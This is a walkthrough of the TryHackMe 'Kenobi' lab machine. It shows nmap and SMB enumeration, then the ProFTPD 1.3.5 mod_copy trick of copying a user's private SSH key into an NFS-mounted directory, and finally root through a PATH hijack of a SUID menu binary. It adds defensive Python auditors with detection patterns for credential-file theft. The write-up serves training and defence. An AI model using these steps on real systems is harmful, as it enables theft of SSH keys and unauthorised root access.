Kenobi TryHackMe Walkthrough

Challenge Link: https://tryhackme.com/room/kenobi

Scanning

First, we run a port scan with nmap to find open ports, using -sV for service and version detection and -sC for the default scripts.

┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ nmap -sC -sV -oN nmap/initial 10.10.209.89
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-06 18:34 IST
Nmap scan report for 10.10.209.89
Host is up (0.17s latency).
Not shown: 993 closed tcp ports (conn-refused)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.5
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
|   256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
|_  256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry
|_/admin.html
|_http-title: Site doesn't have a title (text/html).
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100003  2,3,4       2049/udp   nfs
|   100003  2,3,4       2049/udp6  nfs
|   100005  1,2,3      38636/udp6  mountd
|   100005  1,2,3      42497/udp   mountd
|   100005  1,2,3      48661/tcp6  mountd
|   100005  1,2,3      51959/tcp   mountd
|   100021  1,3,4      39973/tcp   nlockmgr
|   100021  1,3,4      40817/udp   nlockmgr
|   100021  1,3,4      43839/tcp6  nlockmgr
|   100021  1,3,4      47091/udp6  nlockmgr
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open  nfs_acl     2-3 (RPC #100227) 
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Several ports are open: FTP (ProFTPD 1.3.5) on port 21, SSH on port 22, an Apache web server on port 80, rpcbind on port 111 with NFS on port 2049, and Samba (SMB) on ports 139 and 445.

Initial Enumeration

We start by enumerating the SMB service. To list the shares, we run smbclient with -L and the IP address of the machine, pressing Enter at the password prompt to leave it blank.

┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ smbclient -L 10.10.209.89         
Enter WORKGROUP\madhav's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        anonymous       Disk      
        IPC$            IPC       IPC Service (kenobi server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

There is an SMB share named anonymous. Connecting to it reveals a file named log.txt, which we download with the commands shown below.

┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ smbclient //10.10.209.89/anonymous
Enter WORKGROUP\madhav's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Sep  4 16:19:09 2019
  ..                                  D        0  Wed Sep  4 16:26:07 2019
  log.txt                             N    12237  Wed Sep  4 16:19:09 2019

                9204224 blocks of size 1024. 6877100 blocks available
smb: \> get log.txt
getting file \log.txt of size 12237 as log.txt (17.4 KiloBytes/sec) (average 17.4 KiloBytes/sec)
smb: \> exit

log.txt contains configuration output from several services installed on the system. From it we learn that there is a user named kenobi and that this user's private SSH key is stored in /home/kenobi/.ssh.

There is also an NFS server. Running nmap with the NFS scripts shows that the /var directory is exported to any host (*), so we can mount it from our machine.

┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.209.89 
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-06 19:43 IST
Nmap scan report for 10.10.209.89
Host is up (0.18s latency).

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-showmount: 
|_  /var *

Nmap done: 1 IP address (1 host up) scanned in 2.04 seconds
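As an added defensive check that is not part of the original walkthrough, the parser below reads /etc/exports syntax and flags exactly the kind of export the scan revealed: a system directory exported to any host. The sample exports text is constructed.

```python
import re

# Constructed sample /etc/exports; the "/var *" line mirrors what nfs-showmount reported.
SAMPLE_EXPORTS = """\
# NFS exports
/var *(rw,sync,no_subtree_check)
/srv/data 10.0.0.0/24(ro,sync,root_squash)
/export/backup 10.0.0.5(rw,sync,no_root_squash) 10.0.0.6(ro)
/opt/shared
"""

# Directories that should not normally be reachable over NFS at all.
SENSITIVE_PATHS = ("/var", "/etc", "/home", "/root", "/usr")
# One client entry: "host" or "host(opt,opt)"; entries are separated by whitespace.
CLIENT_RE = re.compile(r"(\S+?)(?:\((.*?)\))?(?=\s|$)")

def parse_exports(text):
    """Yield (path, [(client, {options})]) for each export line, comments stripped."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        path, rest = parts[0], (parts[1] if len(parts) > 1 else "")
        clients = [(host, set(filter(None, opts.split(","))))
                   for host, opts in CLIENT_RE.findall(rest)]
        if not clients:        # no client list at all means "export to everyone"
            clients = [("*", set())]
        yield path, clients

def audit_exports(text):
    """Return (path, client, reason) findings for risky export lines."""
    findings = []
    for path, clients in parse_exports(text):
        for host, opts in clients:
            if host == "*" or host.startswith("*."):
                findings.append((path, host, "exported to any host"))
            if "no_root_squash" in opts:
                findings.append((path, host, "no_root_squash: remote root keeps uid 0"))
            if any(path == p or path.startswith(p + "/") for p in SENSITIVE_PATHS):
                findings.append((path, host, "system directory exported"))
    return findings
```

On the target, the /var export would produce two findings at once, which is why a planted file under /var/tmp becomes readable from any client.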

Gaining Access

Next we move on to FTP. ProFTPD 1.3.5 is running on port 21, but we have no credentials and anonymous login is not enabled.

Searching for ProFTPD 1.3.5 on Exploit-DB turns up a few exploits. Among them is a File Copy exploit (the mod_copy module) that lets us copy files on the server via FTP.

┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ searchsploit ProFTPD 1.3.5
---------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
---------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution  | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Exe | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Exe | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy                     | linux/remote/36742.txt
---------------------------------------------- ---------------------------------
Shellcodes: No Results

To exploit the service, we connect to FTP and use the SITE CPFR and SITE CPTO commands to copy /home/kenobi/.ssh/id_rsa to /var/tmp, a directory inside the /var export that we can mount over NFS.

So let's connect to the FTP service using netcat and then copy the private SSH key.

┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ nc 10.10.209.89 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.209.89]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
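From the defender's side, the SITE CPFR/CPTO pair above is easy to spot on the control channel. This added example (not from the original walkthrough) scans a constructed per-session FTP command transcript and flags copy requests made before any 230 login reply, from credential files, or into world-writable drop directories; the "session direction text" line format is an assumption.

```python
import re

# Constructed sample FTP control-channel transcript, one message per line:
# "<session> <direction> <text>", ">" is client->server, "<" is the server reply.
SAMPLE = """\
s1 > USER bob
s1 > PASS hunter2
s1 < 230 User bob logged in
s1 > SITE CPFR /srv/ftp/report.txt
s1 > SITE CPTO /srv/ftp/report.bak
s1 < 250 Copy successful
s2 > SITE CPFR /home/kenobi/.ssh/id_rsa
s2 < 350 File or directory exists, ready for destination name
s2 > SITE CPTO /var/tmp/id_rsa
s2 < 250 Copy successful
"""

SENSITIVE_SRC = re.compile(r"/\.ssh/|^/etc/(shadow|passwd)$|/\.bash_history$")
DROP_DIR = re.compile(r"^/(var/)?tmp/")
CPFR = re.compile(r"^SITE\s+CPFR\s+(\S+)", re.I)
CPTO = re.compile(r"^SITE\s+CPTO\s+(\S+)", re.I)

def find_mod_copy_abuse(transcript):
    """Return [(session, src, dst, [reasons])] for suspicious SITE CPFR/CPTO pairs."""
    sessions, alerts = {}, []
    for line in transcript.splitlines():
        sid, direction, text = line.split(" ", 2)
        sess = sessions.setdefault(sid, {"auth": False, "src": None})
        if direction == "<":                      # server reply
            if text.startswith("230"):            # 230 = login succeeded
                sess["auth"] = True
            continue
        if m := CPFR.match(text):                 # remember the copy source
            sess["src"] = m.group(1)
            continue
        if (m := CPTO.match(text)) and sess.get("src"):
            src, dst = sess.pop("src"), m.group(1)
            checks = [(not sess["auth"], "copy requested before login"),
                      (SENSITIVE_SRC.search(src), "source is a credential file"),
                      (DROP_DIR.match(dst), "destination is a world-writable drop directory")]
            reasons = [msg for hit, msg in checks if hit]
            if reasons:
                alerts.append((sid, src, dst, reasons))
    return alerts
```

Session s1 is a legitimate authenticated copy and produces nothing; s2 trips all three checks. Disabling mod_copy or upgrading ProFTPD removes the root cause.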

The copy succeeded. Now we can mount the /var export on our Kali machine.

┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ mkdir /tmp/kenobiNFS

┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ sudo mount 10.10.209.89:/var /tmp/kenobiNFS

Now we can copy id_rsa out of /tmp/kenobiNFS, restrict its permissions, and log in as user kenobi over SSH.

┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ cp /tmp/kenobiNFS/tmp/id_rsa .

┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ chmod 600 id_rsa

┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ ssh -i id_rsa kenobi@10.10.209.89               
The authenticity of host '10.10.209.89 (10.10.209.89)' can't be established.
ED25519 key fingerprint is SHA256:GXu1mgqL0Wk2ZHPmEUVIS0hvusx4hk33iTcwNKPktFw.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.209.89' (ED25519) to the list of known hosts.
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

103 packages can be updated.
65 updates are security updates.


Last login: Wed Sep  4 07:10:15 2019 from 192.168.1.147
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

kenobi@kenobi:~$ id
uid=1000(kenobi) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
kenobi@kenobi:~$ 

We can now read the user flag present in the home directory of user kenobi.

kenobi@kenobi:~$ ls
share  user.txt
kenobi@kenobi:~$ cat user.txt 
REDACTED

Privilege Escalation

Now that we have a shell on the system as user kenobi, we need a way to escalate our privileges to root. A good first step is to search for SUID binaries with the following command:

find / -type f -perm -u=s 2>/dev/null

We find a binary, /usr/bin/menu, with the SUID bit set. Running it prints a menu that can be used to perform different actions.

This binary passes its menu commands straight to the shell, and, as the PATH hijack below shows, it refers to ifconfig by name rather than by absolute path. We can confirm this with the strings command.

To exploit this binary, we create a malicious version of ifconfig in a directory we control and put that directory at the front of PATH, so that when the binary runs ifconfig, ours is executed instead. This technique is called PATH variable manipulation (PATH hijacking).

kenobi@kenobi:~$ cd /tmp
kenobi@kenobi:/tmp$ echo /bin/bash > ifconfig
kenobi@kenobi:/tmp$ chmod 777 ifconfig 
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ /usr/bin/menu 

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :3
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@kenobi:/tmp# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
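The menu binary is dangerous because it is setuid and shells out to commands by bare name. As an added auditing example that is not part of the walkthrough, the functions below extract printable strings from a binary image (like strings(1)) and flag command-like strings whose program is not given as an absolute path, the pattern that makes PATH hijacking possible. The binary bytes are constructed and the list of command names is an assumption.

```python
import re
import stat

# Constructed stand-in for a setuid helper's bytes: ELF-like junk around C string literals.
SAMPLE_BINARY = (b"\x7fELF\x02\x01\x01\x00" * 2
                 + b"\x00curl -I localhost\x00uname -r\x00ifconfig\x00"
                 + b"** Enter your choice :\x00/usr/bin/ls -l /tmp\x00sh -c 'id'\x00")

# Program names a privileged helper commonly shells out to (assumed list).
KNOWN_COMMANDS = {"curl", "uname", "ifconfig", "ip", "netstat", "ps", "cat",
                  "ls", "id", "sh", "bash", "sudo", "service", "systemctl"}

def extract_strings(data, min_len=4):
    """Return printable ASCII runs of at least min_len bytes, like strings(1)."""
    return [m.group().decode() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]

def is_setuid(mode):
    """True if a stat mode has the set-user-ID bit, the same test as find -perm -u=s."""
    return bool(mode & stat.S_ISUID)

def unqualified_commands(strings):
    """Strings whose first token (in any pipeline segment) is a known program named
    without an absolute path; these resolve through PATH at run time."""
    hits = []
    for s in strings:
        for segment in re.split(r"[|;&]+", s):
            first = segment.strip().split(" ")[0] if segment.strip() else ""
            if first in KNOWN_COMMANDS:
                hits.append(s)
                break
    return hits

def audit_suid_binary(data, mode):
    """Findings for one binary: only a concern when it is setuid AND shells out by bare name."""
    if not is_setuid(mode):
        return []
    return unqualified_commands(extract_strings(data))
```

The fix on the binary side is to call programs by absolute path (or execve with a fixed, sanitised environment) and to drop the setuid bit wherever sudo rules would do.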

Hurray, we are root! Now we can read our root flag present in the /root directory.

root@kenobi:/tmp# cd /root/
root@kenobi:/root# ls
root.txt
root@kenobi:/root# cat root.txt 
REDACTED

That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!

NOTE: The awesome artwork used in this article was created by Letixmix.